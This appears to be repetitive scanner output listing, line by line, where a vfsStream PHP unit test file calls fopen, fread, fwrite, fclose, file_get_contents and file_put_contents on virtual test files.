    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fread was found in the file vfsStreamWrapperFileTestCase.php
    Ligne134: $this->assertEquals('z', fread($fp, 1));
    Ligne136: $this->assertEquals(' 1', fread($fp, 8092));
    Ligne249: $this->assertEquals('baz2', fread($fp, 4096));
    Ligne263: $this->assertEquals('', fread($fp, 4096));
    Ligne266: $this->assertEquals('', fread($fp, 4096));
    Ligne279: $this->assertEquals('', fread($fp, 4096));
    Ligne282: $this->assertEquals('', fread($fp, 4096));
    Ligne296: $this->assertEquals('', fread($fp, 4096));
    Ligne299: $this->assertEquals('', fread($fp, 4096));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
